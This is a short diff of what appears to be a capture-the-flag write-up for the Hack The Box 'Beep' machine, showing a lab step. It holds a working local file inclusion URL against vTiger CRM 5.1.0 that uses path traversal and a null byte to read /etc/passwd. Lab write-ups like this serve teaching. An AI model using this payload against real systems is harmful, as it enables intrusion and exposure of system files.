pencer-io/pencer-io.github.io/_posts/2020-04-21-ctf-htb-beep.md

 vTiger CRM 5.1.0 - Local File Inclusion  |  exploits/php/webapps/18770.txt
 ```

-Exploit shows how to use LFI to navigate to sub directories, use this in browser to get passwd list:
+Exploit shows how to use LFI to navigate to sub-directories, use this in browser to get passwd file:

 ```text
 https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
 ```

 Press ctrl-u to view source, shows as a proper list instead of jumble.

 Copy and paste in to vi, remove all users with no login by doing: